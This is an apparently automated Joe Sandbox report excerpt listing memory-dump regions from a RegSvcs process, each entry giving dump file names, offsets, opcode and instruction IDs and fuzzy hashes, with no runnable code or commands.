                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Haq
                                                                                                                                                                                • API String ID: 0-725504367
                                                                                                                                                                                • Opcode ID: 354d6f0f747f0380d5e78791ef6297cd4234101d704da2d7ac8bdce1071b84e3
                                                                                                                                                                                • Instruction ID: 0d4a662dd477ddde7cbcb87fedea146f00f8297c8f4654a883fa5a20ca16c1fc
                                                                                                                                                                                • Opcode Fuzzy Hash: 354d6f0f747f0380d5e78791ef6297cd4234101d704da2d7ac8bdce1071b84e3
                                                                                                                                                                                • Instruction Fuzzy Hash: 47512535B043455FD706EBB89C44AAE3FFAAF96201B8444BAE509CB792DE708C06C7D1
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: (o]q
                                                                                                                                                                                • API String ID: 0-794736227
                                                                                                                                                                                • Opcode ID: 45fe3e116e65fcfe6cfdc60a28336db13c848b90521e0fc72239b84672bd12ca
                                                                                                                                                                                • Instruction ID: e3547dcd2ecd087d6eed63dc492a2062a19fcab23e51d8260304cc00f8844ec7
                                                                                                                                                                                • Opcode Fuzzy Hash: 45fe3e116e65fcfe6cfdc60a28336db13c848b90521e0fc72239b84672bd12ca
                                                                                                                                                                                • Instruction Fuzzy Hash: C141D131B042148FDB149B68D898AAEBFBABFC8711F548469E90AD7391DE719C05CB90
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Haq
                                                                                                                                                                                • API String ID: 0-725504367
                                                                                                                                                                                • Opcode ID: f53a2e3b06d47f535ee385c7118c9279325ac93a3dd442a0cfadf42e067b4540
                                                                                                                                                                                • Instruction ID: 7d805bc10e930e3013d3c6ada0591e468eaf6b3390e0612794691054d67784b3
                                                                                                                                                                                • Opcode Fuzzy Hash: f53a2e3b06d47f535ee385c7118c9279325ac93a3dd442a0cfadf42e067b4540
                                                                                                                                                                                • Instruction Fuzzy Hash: 87310B317042459FD7069BBCC8546AD7FFAEFA5210F5880A5D409CBA96DA319D0AC3C0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 7cdbe075af5364088e69ea7b2adb3831e8b718c3b51454250d788cc2f4daf503
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: f9adfce731dc75bddd4d0cebe97a0948f68fccc838f3a533d93630f87ea62184
                                                                                                                                                                                • Instruction ID: 12dcd522a4296c8334123747717a335f8784ca42e5ffd6b95b2a7a040cc1783f
                                                                                                                                                                                • Opcode Fuzzy Hash: f9adfce731dc75bddd4d0cebe97a0948f68fccc838f3a533d93630f87ea62184
                                                                                                                                                                                • Instruction Fuzzy Hash: 902148353401114BEB1A0629C495B3E3A9FAFC421AF948439E60ACB795DE7BCC46D3C1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: e3ad6d77fb67ed905b0381729bef834db09c1e4782d4a4468fa21401fcf728fa
                                                                                                                                                                                • Instruction ID: 4c18e9400f2b4093bceb6209e61fb0e52ea08d2ccd540c33e34004b189a232e4
                                                                                                                                                                                • Opcode Fuzzy Hash: e3ad6d77fb67ed905b0381729bef834db09c1e4782d4a4468fa21401fcf728fa
                                                                                                                                                                                • Instruction Fuzzy Hash: 3921F235700512CFE7258A29D494A2EB7A6FFC9711B568079E90ECB344CF70CC068BC0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: dd9d3e927d562a100a7c2c56da0ee2cbda1bc5ec6a65ed334c45a8aee228178e
                                                                                                                                                                                • Instruction ID: c57e2945db7816581426ad251f2829b57871dc0a385b99b79697d27939b45e02
                                                                                                                                                                                • Opcode Fuzzy Hash: dd9d3e927d562a100a7c2c56da0ee2cbda1bc5ec6a65ed334c45a8aee228178e
                                                                                                                                                                                • Instruction Fuzzy Hash: 93218E35A001069FCB24DF68D8409FF77A9EB89264F548469D91D9B340EB35EA0ECBD2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: f78395c8ef86b804ce79ace221a6daa9115ccdf0086f12da477ec6182afbef89
                                                                                                                                                                                • Instruction ID: af4aef0592cfc98ffb1a742379ddd44dfa071c9cf50e4fb00140f15f8bfed5f4
                                                                                                                                                                                • Opcode Fuzzy Hash: f78395c8ef86b804ce79ace221a6daa9115ccdf0086f12da477ec6182afbef89
                                                                                                                                                                                • Instruction Fuzzy Hash: BF21F870E04209DFDB05EFB9D4406AEBBB6FF84304F54C4A99508AB348DB799949CF81
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 80bfef35db218648f44a07b1c83aa5f13c191b8bf098ab3c966b42f9051fdb0f
                                                                                                                                                                                • Instruction ID: f86ddaa1c63c09927f9e360414359a959ec27078b1b889909f7d7a997f4b63fc
                                                                                                                                                                                • Opcode Fuzzy Hash: 80bfef35db218648f44a07b1c83aa5f13c191b8bf098ab3c966b42f9051fdb0f
                                                                                                                                                                                • Instruction Fuzzy Hash: 5331C774E11308CFCB14DFA8D5848AEBBB6FF49304B2094A9E909AB364DB35AD05CF41
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 82dfbfd4ea2ceeb6c01ad7e67accf5d9d0efcc4dc754ebc5283ef70551f6ded1
                                                                                                                                                                                • Instruction ID: 65fccf133310a4b02c350612b8fc224322816b021c16ac4ade434ee7d9030f07
                                                                                                                                                                                • Opcode Fuzzy Hash: 82dfbfd4ea2ceeb6c01ad7e67accf5d9d0efcc4dc754ebc5283ef70551f6ded1
                                                                                                                                                                                • Instruction Fuzzy Hash: A1216F36A001049FEB109A58DC89FA9BBB9BB8C715F548025FA1AA7391DA71AC14CB90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 675a68c03227bf24b74eab52814abf05fa734b6f9d2af63bc8cf794a031eeeb0
                                                                                                                                                                                • Instruction ID: 92ae17508b409cd2c66e952847074614818039660b66dfd7cd61c80b094c9c9b
                                                                                                                                                                                • Opcode Fuzzy Hash: 675a68c03227bf24b74eab52814abf05fa734b6f9d2af63bc8cf794a031eeeb0
                                                                                                                                                                                • Instruction Fuzzy Hash: 20219F70E002499FDB15CFA5D540AEEBFBAEF48302F248069E455E7290DB35D944DF60
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 1842304764630195590501c49575d4ddd0d20e754063ee161c7e75ddc4de8aa9
                                                                                                                                                                                • Instruction ID: cf4595d2ca807a17c88fcc7621d895adb1eb05c0f9772f212e9d1f953b5c1f78
                                                                                                                                                                                • Opcode Fuzzy Hash: 1842304764630195590501c49575d4ddd0d20e754063ee161c7e75ddc4de8aa9
                                                                                                                                                                                • Instruction Fuzzy Hash: 7B218170E04209DFDB08EFB9D4446AEBBBAFF84304F50C4A99409AB348DB799945CF81
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 3697da3536676f8bed438369af2894b2c5ebdb071db164f66438f15647fac749
                                                                                                                                                                                • Instruction ID: a0b46af9443f2af1283a75189a2e62b2d28cc8f707c67ac6cecfe164adf1097e
                                                                                                                                                                                • Opcode Fuzzy Hash: 3697da3536676f8bed438369af2894b2c5ebdb071db164f66438f15647fac749
                                                                                                                                                                                • Instruction Fuzzy Hash: 1C213470C052098FCB00DFA8D945AEEBFF4FF0A300F04516AD919B7211EB345A84CBA2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 14b1ad6385934bb0cfb9667423c75044d01967b360d04aa32e4c8690c94a008a
                                                                                                                                                                                • Instruction ID: dffee295fcde6e648370e65ddbd85dc2a3a7d858908c15c6173bb01a8c448750
                                                                                                                                                                                • Opcode Fuzzy Hash: 14b1ad6385934bb0cfb9667423c75044d01967b360d04aa32e4c8690c94a008a
                                                                                                                                                                                • Instruction Fuzzy Hash: 4A118F353002048FC714DB6DD998E56B7FAFF88721F508469E209CB761CA71EC08CB50
                                                                                                                                                                                Memory Dump Source
• Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b14e0c3ff026accb8c85f5884258b9b6d89d83f49666ab7f1f5fb368443db2aa
• Instruction ID: dfafa3f2a1dea0f4dc5609b74abc0ca5b58b2355504698df66346a269efa02e4
• Opcode Fuzzy Hash: b14e0c3ff026accb8c85f5884258b9b6d89d83f49666ab7f1f5fb368443db2aa
• Instruction Fuzzy Hash: 2311E531700612DFE7195A2AD454A2EBBAAFFC56627564078E90BCB350CF70DC0687D0
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 93724112599f6706010de43ac9795b4100b8bc6ee9fe2ab82850d91730928a80
                                                                                                                                                                                • Instruction ID: d9afe6a6efbd33902e24911cb515e3f2677d0d4d17157a8691a3b34f09fdd0a2
                                                                                                                                                                                • Opcode Fuzzy Hash: 93724112599f6706010de43ac9795b4100b8bc6ee9fe2ab82850d91730928a80
                                                                                                                                                                                • Instruction Fuzzy Hash: 9BC0123044430A4FC549EB65FE86E65772EEE90304B609524A00A0655EEFBD5C498A90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: ca79877d5fae97cb43934dc5d7d514872cda90bd5afd63257fe8844bec097249
                                                                                                                                                                                • Instruction ID: c440b1a48e8111fbd8128c80cb8f33a9e144a5b3c7097e3335b256f3b8c2fde4
                                                                                                                                                                                • Opcode Fuzzy Hash: ca79877d5fae97cb43934dc5d7d514872cda90bd5afd63257fe8844bec097249
                                                                                                                                                                                • Instruction Fuzzy Hash: 1DC1D274E00218CFDB54DFA9D984BADBBB6EF89300F6080A9D808A7355DB359E85CF50
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 565a6b50218e44863a31284fd5a25619453a161df919c8e2e8bbf67b2dfaebe8
                                                                                                                                                                                • Instruction ID: d3a22ea7ff86cf2c9145f8c13b576c0b8ed01e47e7014e1b5770fed0027c5fc1
                                                                                                                                                                                • Opcode Fuzzy Hash: 565a6b50218e44863a31284fd5a25619453a161df919c8e2e8bbf67b2dfaebe8
                                                                                                                                                                                • Instruction Fuzzy Hash: ABC1C274E00218CFDB54DFA9D984BADBBB6BF88300F6080A9D808A7355DB359E85CF51
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 42d372171ec5e1be8293d819b47603b1229eff950adaf707228e4c2e1445b17b
                                                                                                                                                                                • Instruction ID: 4796dc2c6bffb19579e43747bf733b852792a66f19db9f7858600e35bdc0c2fa
                                                                                                                                                                                • Opcode Fuzzy Hash: 42d372171ec5e1be8293d819b47603b1229eff950adaf707228e4c2e1445b17b
                                                                                                                                                                                • Instruction Fuzzy Hash: 15C1D174E00218CFDB54DFA9D984BADBBB6EF89300F2080A9D808AB355DB359D85CF50
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: ca6c0a9fd8ff8eed64864bfa1e58c3697f2f1cb7719044dee0fb651f8ac31895
                                                                                                                                                                                • Instruction ID: 7f7e2d9f3d30bd76c1e64c874550099fb700da12d344b731dc50d9be69f1874c
                                                                                                                                                                                • Opcode Fuzzy Hash: ca6c0a9fd8ff8eed64864bfa1e58c3697f2f1cb7719044dee0fb651f8ac31895
                                                                                                                                                                                • Instruction Fuzzy Hash: B1C1E374E00218CFDB54DFA9D944BADBBB6BF88300F6084A9D408AB355DB359E85CF51
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 55babc4cf290db4e90982ce02b28328ae9a3e3beec0752ad87035fc086536ef2
                                                                                                                                                                                • Instruction ID: 90dba28fc6b1d4f1651b85b96eb355189b02e325eadd89078a39c895d91aa2ce
                                                                                                                                                                                • Opcode Fuzzy Hash: 55babc4cf290db4e90982ce02b28328ae9a3e3beec0752ad87035fc086536ef2
                                                                                                                                                                                • Instruction Fuzzy Hash: 29C1C274E00218CFDB54DFA9D984BADBBB6BF89300F6080A9D808A7355DB359D85CF50
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3403801741.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_68e0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 726e45311b305bb6f9d3360735a9f63bfac859ab8ef99a32dd0fa333fdc5e87d
                                                                                                                                                                                • Instruction ID: 8f8296eb36843a1186599e013163fc0150388f759b7f021b1c246d5681e59a40
                                                                                                                                                                                • Opcode Fuzzy Hash: 726e45311b305bb6f9d3360735a9f63bfac859ab8ef99a32dd0fa333fdc5e87d
                                                                                                                                                                                • Instruction Fuzzy Hash: 40C1C274E00218CFDB54DFA5D984BADBBB6BF89300F2080A9D809AB365DB359D85CF51
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3403801741.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_68e0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 294aee834d683dbc95111e711782bdffb2c75d496faed1b8fae287efa463d7b5
                                                                                                                                                                                • Instruction ID: 0c4436fdbab984188640fb683ff39937db071e1d7f0a1317004bc9e6375d1573
                                                                                                                                                                                • Opcode Fuzzy Hash: 294aee834d683dbc95111e711782bdffb2c75d496faed1b8fae287efa463d7b5
                                                                                                                                                                                • Instruction Fuzzy Hash: 71C1C174E00218CFDB54DFA5D984BADBBB6BF89300F2080A9D809AB355DB359E85CF51
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3403801741.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_68e0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 0c3aa162508a95a36f163786fa0c35751196d290c68331c7100344422acf23cb
                                                                                                                                                                                • Instruction ID: 40df9ac98845276f4d4000d0ff335ef6622ac108289c0c75fd2fc4470e201092
                                                                                                                                                                                • Opcode Fuzzy Hash: 0c3aa162508a95a36f163786fa0c35751196d290c68331c7100344422acf23cb
                                                                                                                                                                                • Instruction Fuzzy Hash: CDC1B074E00218CFDB54DFA5D984BADBBB6BF89300F2080A9D809AB355DB359E85CF51
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3403801741.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_68e0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 2d8bea2876dc6d3b1c79551d7b7ade881a97bb59cc31f93ff2e1b2a9fff580db
                                                                                                                                                                                • Instruction ID: 7c0d93d961c02f038db44eaf018121f7b33747f85b11311ac1b654a60ad6c75a
                                                                                                                                                                                • Opcode Fuzzy Hash: 2d8bea2876dc6d3b1c79551d7b7ade881a97bb59cc31f93ff2e1b2a9fff580db
                                                                                                                                                                                • Instruction Fuzzy Hash: 73C1A074E00218CFDB54DFA5D984BADBBB6AF89300F2080A9D809AB355DB359E85CF51
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3403801741.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_68e0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 235c310653348cf1c87b5c87365fd16d24f0cb6954763b031b46462bd5588ed2
                                                                                                                                                                                • Instruction ID: 1da7177ec05590a8a90d3c603d17d4e2089101099abe0f92c5d6777e2528aea1
                                                                                                                                                                                • Opcode Fuzzy Hash: 235c310653348cf1c87b5c87365fd16d24f0cb6954763b031b46462bd5588ed2
                                                                                                                                                                                • Instruction Fuzzy Hash: A8C1C174E00218CFDB54DFA5D984BADBBB6BF89300F2080A9D809AB355DB359E85CF51
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3403801741.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_68e0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: b84c613a71030254dffe5f03da308297fc30a412681dcd5d7f1e0fc8e7b53c7f
                                                                                                                                                                                • Instruction ID: 06c22cc4421e68619d29f66628d01a7d9ea2339e4380b2a342f4ffb2798e9792
                                                                                                                                                                                • Opcode Fuzzy Hash: b84c613a71030254dffe5f03da308297fc30a412681dcd5d7f1e0fc8e7b53c7f
                                                                                                                                                                                • Instruction Fuzzy Hash: 75C1B174E00218CFDB64DFA5D944BADBBB6BF89300F2080A9D809AB355DB359E85CF51
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3403801741.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_68e0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 468f246129c31be5fc9255ef14d0df84df5c71e1073dbaa36aeee48c4c08fd13
                                                                                                                                                                                • Instruction ID: c87ae272c2583e0b8b78001411e1153a69b9075949152450279e70a6ae2bbae1
                                                                                                                                                                                • Opcode Fuzzy Hash: 468f246129c31be5fc9255ef14d0df84df5c71e1073dbaa36aeee48c4c08fd13
                                                                                                                                                                                • Instruction Fuzzy Hash: DBC1B074E00218CFDB54DFA5D984BADBBB6BF89300F2080A9D809AB355DB359E85CF51
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3403801741.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_68e0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 354d404cfaa13703982d115d2de8844908815d80de3d2dc80b01c1eb1d814d77
                                                                                                                                                                                • Instruction ID: 3b75322bef000717783ac64d88d11a415974ef2be3bdf691d87f4e821e0bd592
                                                                                                                                                                                • Opcode Fuzzy Hash: 354d404cfaa13703982d115d2de8844908815d80de3d2dc80b01c1eb1d814d77
                                                                                                                                                                                • Instruction Fuzzy Hash: 49C1B174E00218CFDB54DFA5D984BADBBB6BF89300F2080A9D809AB355DB359E85CF51
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3403801741.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_68e0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a0464bc0d1c45a50fa1bd14747bd1543e550df48d7559b9963132be3f5d5761e
                                                                                                                                                                                • Instruction ID: e1e94c4a11f9372b7cd6208764f5177091cc7042db45efe4fb69ff5238247ee2
                                                                                                                                                                                • Opcode Fuzzy Hash: a0464bc0d1c45a50fa1bd14747bd1543e550df48d7559b9963132be3f5d5761e
                                                                                                                                                                                • Instruction Fuzzy Hash: F3C1B074E00218CFDB54DFA5D984BADBBB6BF89300F2080A9D809AB355DB359E85CF51
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3403801741.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_68e0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 109866c7cfab0295f34bcb3f58dce4037161f8d15087c645d81e172418099066
